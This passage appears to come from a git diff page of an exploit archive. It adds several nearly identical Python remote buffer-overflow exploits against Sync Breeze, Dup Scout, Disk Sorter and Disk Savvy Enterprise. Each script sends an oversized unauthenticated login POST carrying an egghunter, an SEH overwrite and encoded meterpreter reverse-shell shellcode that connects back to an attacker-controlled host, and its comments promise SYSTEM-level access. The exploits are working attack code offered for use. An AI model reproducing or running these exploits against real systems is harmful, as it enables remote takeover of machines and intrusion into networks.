buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
|
||||
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
|
||||
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
|
||||
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
|
||||
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
|
||||
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
|
||||
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
|
||||
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
|
||||
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
|
||||
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
|
||||
|
||||
#pop pop ret 100159be
|
||||
|
||||
nseh = "\x90\x90\xEB\x0B"
|
||||
seh = "\xbe\x59\x01\x10"
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
|
||||
|
||||
evil = "POST /login HTTP/1.1\r\n"
|
||||
evil += "Host: 192.168.123.132\r\n"
|
||||
evil += "User-Agent: Mozilla/5.0\r\n"
|
||||
evil += "Connection: close\r\n"
|
||||
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
evil += "Accept-Language: en-us,en;q=0.5\r\n"
|
||||
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
||||
evil += "Keep-Alive: 300\r\n"
|
||||
evil += "Proxy-Connection: keep-alive\r\n"
|
||||
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
evil += "Content-Length: 17000\r\n\r\n"
|
||||
evil += "username=admin"
|
||||
evil += "&password=aaaaa\r\n"
|
||||
evil += "\x41" * 12292 #subtract/add for payload
|
||||
evil += "w00tw00t"
|
||||
evil += "\x90" * 20
|
||||
evil += buf
|
||||
evil += "\x90" * 50
|
||||
evil += "\x42" * 1614
|
||||
evil += nseh
|
||||
evil += seh
|
||||
evil += "\x90" * 20
|
||||
evil += egghunter
|
||||
evil += "\x90" * 7000
|
||||
|
||||
print 'Sending evil buffer...'
|
||||
s.send(evil)
|
||||
print 'Payload Sent!'
|
||||
s.close()
|
||||
|
||||
|
93
platforms/windows/remote/40456.py
Executable file
93
platforms/windows/remote/40456.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
|
||||
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
|
||||
|
||||
#Author website: www.tulpa-security.com
|
||||
#Author twitter: @tulpa_security
|
||||
|
||||
#Exploit will land you NT AUTHORITY\SYSTEM
|
||||
#You do not need to be authenticated, password below is garbage
|
||||
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
|
||||
#Tested on Windows 7 x86 Enterprise SP1
|
||||
|
||||
#Greetings to ozzie_offsec and carbonated
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.123.132',80))
|
||||
|
||||
#bad chars \x00\x0a\x0d\x26
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
|
||||
|
||||
#payload size 308
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
|
||||
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
|
||||
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
|
||||
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
|
||||
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
|
||||
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
|
||||
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
|
||||
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
|
||||
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
|
||||
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
|
||||
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
|
||||
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
|
||||
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
|
||||
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
|
||||
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
|
||||
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
|
||||
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
|
||||
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
|
||||
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
|
||||
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
|
||||
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
|
||||
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
|
||||
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
|
||||
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
|
||||
|
||||
#pop pop ret 10030991
|
||||
|
||||
nseh = "\x90\x90\xEB\x0B"
|
||||
seh = "\x91\x09\x03\x10"
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
|
||||
|
||||
evil = "POST /login HTTP/1.1\r\n"
|
||||
evil += "Host: 192.168.123.132\r\n"
|
||||
evil += "User-Agent: Mozilla/5.0\r\n"
|
||||
evil += "Connection: close\r\n"
|
||||
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
evil += "Accept-Language: en-us,en;q=0.5\r\n"
|
||||
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
||||
evil += "Keep-Alive: 300\r\n"
|
||||
evil += "Proxy-Connection: keep-alive\r\n"
|
||||
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
evil += "Content-Length: 17000\r\n\r\n"
|
||||
evil += "username=admin"
|
||||
evil += "&password=aaaaa\r\n"
|
||||
evil += "\x41" * 12292 #subtract/add for payload
|
||||
evil += "w00tw00t"
|
||||
evil += "\x90" * 20
|
||||
evil += buf
|
||||
evil += "\x90" * 50
|
||||
evil += "\x42" * 1614
|
||||
evil += nseh
|
||||
evil += seh
|
||||
evil += "\x90" * 20
|
||||
evil += egghunter
|
||||
evil += "\x90" * 7000
|
||||
|
||||
print 'Sending evil buffer...'
|
||||
s.send(evil)
|
||||
print 'Payload Sent!'
|
||||
s.close()
|
||||
|
||||
|
93
platforms/windows/remote/40457.py
Executable file
93
platforms/windows/remote/40457.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit"
|
||||
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
|
||||
|
||||
#Author website: www.tulpa-security.com
|
||||
#Author twitter: @tulpa_security
|
||||
|
||||
#Exploit will land you NT AUTHORITY\SYSTEM
|
||||
#You do not need to be authenticated, password below is garbage
|
||||
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
|
||||
#Tested on Windows 7 x86 Enterprise SP1
|
||||
|
||||
#Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.123.132',80))
|
||||
|
||||
#bad chars \x00\x0a\x0d\x26
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
|
||||
|
||||
#payload size 308
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
|
||||
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
|
||||
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
|
||||
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
|
||||
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
|
||||
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
|
||||
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
|
||||
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
|
||||
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
|
||||
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
|
||||
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
|
||||
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
|
||||
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
|
||||
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
|
||||
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
|
||||
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
|
||||
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
|
||||
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
|
||||
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
|
||||
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
|
||||
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
|
||||
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
|
||||
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
|
||||
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
|
||||
|
||||
#pop pop ret 1006cd33
|
||||
|
||||
nseh = "\x90\x90\xEB\x0B"
|
||||
seh = "\x33\xcd\x06\x10"
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
|
||||
|
||||
evil = "POST /login HTTP/1.1\r\n"
|
||||
evil += "Host: 192.168.123.132\r\n"
|
||||
evil += "User-Agent: Mozilla/5.0\r\n"
|
||||
evil += "Connection: close\r\n"
|
||||
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
evil += "Accept-Language: en-us,en;q=0.5\r\n"
|
||||
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
||||
evil += "Keep-Alive: 300\r\n"
|
||||
evil += "Proxy-Connection: keep-alive\r\n"
|
||||
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
evil += "Content-Length: 17000\r\n\r\n"
|
||||
evil += "username=admin"
|
||||
evil += "&password=aaaaa\r\n"
|
||||
evil += "\x41" * 12292 #subtract/add for payload
|
||||
evil += "w00tw00t"
|
||||
evil += "\x90" * 20
|
||||
evil += buf
|
||||
evil += "\x90" * 50
|
||||
evil += "\x42" * 1614
|
||||
evil += nseh
|
||||
evil += seh
|
||||
evil += "\x90" * 20
|
||||
evil += egghunter
|
||||
evil += "\x90" * 7000
|
||||
|
||||
print 'Sending evil buffer...'
|
||||
s.send(evil)
|
||||
print 'Payload Sent!'
|
||||
s.close()
|
||||
|
||||
|
93
platforms/windows/remote/40458.py
Executable file
93
platforms/windows/remote/40458.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
print "Disk Sorter Enterprise 9.0.24 Buffer Overflow Exploit"
|
||||
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
|
||||
|
||||
#Author website: www.tulpa-security.com
|
||||
#Author twitter: @tulpa_security
|
||||
|
||||
#Exploit will land you NT AUTHORITY\SYSTEM
|
||||
#You do not need to be authenticated, password below is garbage
|
||||
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
|
||||
#Tested on Windows 7 x86 Enterprise SP1
|
||||
|
||||
#Shout-out to ozzie_offsec and carbonated
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.123.132',80))
|
||||
|
||||
#bad chars \x00\x0a\x0d\x26
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
|
||||
|
||||
#payload size 308
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
|
||||
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
|
||||
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
|
||||
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
|
||||
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
|
||||
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
|
||||
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
|
||||
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
|
||||
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
|
||||
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
|
||||
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
|
||||
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
|
||||
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
|
||||
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
|
||||
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
|
||||
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
|
||||
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
|
||||
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
|
||||
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
|
||||
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
|
||||
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
|
||||
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
|
||||
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
|
||||
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
|
||||
|
||||
#pop pop ret 10048d36
|
||||
|
||||
nseh = "\x90\x90\xEB\x0B"
|
||||
seh = "\x36\x8d\x04\x10"
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
|
||||
|
||||
evil = "POST /login HTTP/1.1\r\n"
|
||||
evil += "Host: 192.168.123.132\r\n"
|
||||
evil += "User-Agent: Mozilla/5.0\r\n"
|
||||
evil += "Connection: close\r\n"
|
||||
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
evil += "Accept-Language: en-us,en;q=0.5\r\n"
|
||||
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
||||
evil += "Keep-Alive: 300\r\n"
|
||||
evil += "Proxy-Connection: keep-alive\r\n"
|
||||
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
evil += "Content-Length: 17000\r\n\r\n"
|
||||
evil += "username=admin"
|
||||
evil += "&password=aaaaa\r\n"
|
||||
evil += "\x41" * 12292 #subtract/add for payload
|
||||
evil += "w00tw00t"
|
||||
evil += "\x90" * 20
|
||||
evil += buf
|
||||
evil += "\x90" * 50
|
||||
evil += "\x42" * 1614
|
||||
evil += nseh
|
||||
evil += seh
|
||||
evil += "\x90" * 20
|
||||
evil += egghunter
|
||||
evil += "\x90" * 7000
|
||||
|
||||
print 'Sending evil buffer...'
|
||||
s.send(evil)
|
||||
print 'Payload Sent!'
|
||||
s.close()
|
||||
|
||||
|
93
platforms/windows/remote/40459.py
Executable file
93
platforms/windows/remote/40459.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
print "Disk Savvy Enterprise 9.0.32 Buffer Overflow Exploit"
|
||||
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
|
||||
|
||||
#Author website: www.tulpa-security.com
|
||||
#Author twitter: @tulpa_security
|
||||
|
||||
#Exploit will land you NT AUTHORITY\SYSTEM
|
||||
#You do not need to be authenticated, password below is garbage
|
||||
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
|
||||
#Tested on Windows 7 x86 Enterprise SP1
|
||||
|
||||
#Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.123.132',80))
|
||||
|
||||
#bad chars \x00\x0a\x0d\x26
|
||||
|
||||
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
|
||||
|
||||
#payload size 308
|
||||
|
||||
buf = ""
|
||||
buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
|
||||
buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
|
||||
buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
|
||||
buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
|
||||
buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
|
||||
buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
|
||||
buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
|
||||
buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
|
||||
buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
|
||||
buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
|
||||
buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
|
||||
buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
|
||||
buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
|
||||
buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55"
|
||||
buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa"
|
||||
buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48"
|
||||
buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b"
|
||||
buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8"
|
||||
buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84"
|
||||
buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6"
|
||||
buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c"
|
||||
buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1"
|
||||
buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f"
|
||||
buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc"
|
||||
|
||||
#pop pop ret 10076451
|
||||
|
||||
nseh = "\x90\x90\xEB\x0B"
|
||||
seh = "\x51\x64\x07\x10"
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
|
||||
|
||||
evil = "POST /login HTTP/1.1\r\n"
|
||||
evil += "Host: 192.168.123.132\r\n"
|
||||
evil += "User-Agent: Mozilla/5.0\r\n"
|
||||
evil += "Connection: close\r\n"
|
||||
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
||||
evil += "Accept-Language: en-us,en;q=0.5\r\n"
|
||||
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
|
||||
evil += "Keep-Alive: 300\r\n"
|
||||
evil += "Proxy-Connection: keep-alive\r\n"
|
||||
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
|
||||
evil += "Content-Length: 17000\r\n\r\n"
|
||||
evil += "username=admin"
|
||||
evil += "&password=aaaaa\r\n"
|
||||
evil += "\x41" * 12292 #subtract/add for payload
|
||||
evil += "w00tw00t"
|
||||
evil += "\x90" * 20
|
||||
evil += buf
|
||||
evil += "\x90" * 50
|
||||
evil += "\x42" * 1614
|
||||
evil += nseh
|
||||
evil += seh
|
||||
evil += "\x90" * 20
|
||||
evil += egghunter
|
||||
evil += "\x90" * 7000
|
||||
|
||||
print 'Sending evil buffer...'
|
||||
s.send(evil)
|
||||
print 'Payload Sent!'
|
||||
s.close()
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue